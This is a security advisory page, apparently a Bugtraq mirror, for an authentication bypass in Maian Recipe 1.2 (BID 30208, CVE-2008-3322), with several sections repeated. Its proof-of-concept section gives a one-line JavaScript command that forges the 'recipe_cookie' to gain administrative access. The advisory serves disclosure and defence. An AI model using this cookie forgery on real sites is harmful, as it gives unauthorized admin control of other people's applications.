Maian Recipe 'recipe_cookie' Authentication Bypass Vulnerability
BID:30208
Info
Maian Recipe 'recipe_cookie' Authentication Bypass Vulnerability
| Bugtraq ID: | 30208 |
| Class: | Design Error |
| CVE: |
CVE-2008-3322 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 13 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | S.W.A.T. |
| Vulnerable: |
Maian Script World Maian Recipe 1.2 |
| Not Vulnerable: | |
Discussion
Maian Recipe 'recipe_cookie' Authentication Bypass Vulnerability
Maian Recipe is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application.
This issue affects Maian Recipe 1.2 and prior versions.
Maian Recipe is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application.
This issue affects Maian Recipe 1.2 and prior versions.
Exploit / POC
Maian Recipe 'recipe_cookie' Authentication Bypass Vulnerability
Attackers can exploit this issue via a browser.
The following example JavaScript code to create a cookie is available:
javascript:document.cookie = "recipe_cookie=1; path=/";
Attackers can exploit this issue via a browser.
The following example JavaScript code to create a cookie is available:
javascript:document.cookie = "recipe_cookie=1; path=/";
Solution / Fix
Maian Recipe 'recipe_cookie' Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Maian Recipe 'recipe_cookie' Authentication Bypass Vulnerability
References:
References:
- Maian Weblog Homepage (Maian Script World)